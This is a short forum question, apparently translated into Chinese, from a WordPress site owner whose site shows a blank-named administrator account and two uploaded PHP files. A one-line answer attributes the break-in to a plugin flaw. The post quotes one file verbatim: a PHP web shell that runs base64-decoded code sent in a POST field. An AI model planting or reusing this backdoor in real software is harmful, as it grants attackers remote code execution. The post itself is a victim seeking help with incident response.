我收到了一封来自wordfence插件的电子邮件,其中一位用户(空用户名)已登录管理区域。
A user with username " " who has administrator access signed in to your WordPress site.
在用户中,有一个没有数据的新用户。电子邮件,用户名等都是空的。这是第一个问题。第二个问题可能是这个问题的结果......
某些php文件已上传到/ wp-content / uploads / 2014/03文件夹,dir.php和841rewb3v4x.php
dir.php具有以下代码
<?php eval(base64_decode($_POST['n358cfa']));?>
另一个文件编码了php代码,可在此处找到http://www.unphp.net/decode/f845fc88a23b7a59b3f5c04ed09cf7b0/
如果有人知道,该代码有什么作用?另外,我该怎么做呢? (我已经删除了用户和文件)。
谢谢!
答案 0 :(得分:0)
最后,关于这个问题的一些重要信息!这是因为邮箱插件存在巨大漏洞。
您可以在此处查看更多详细信息:
http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html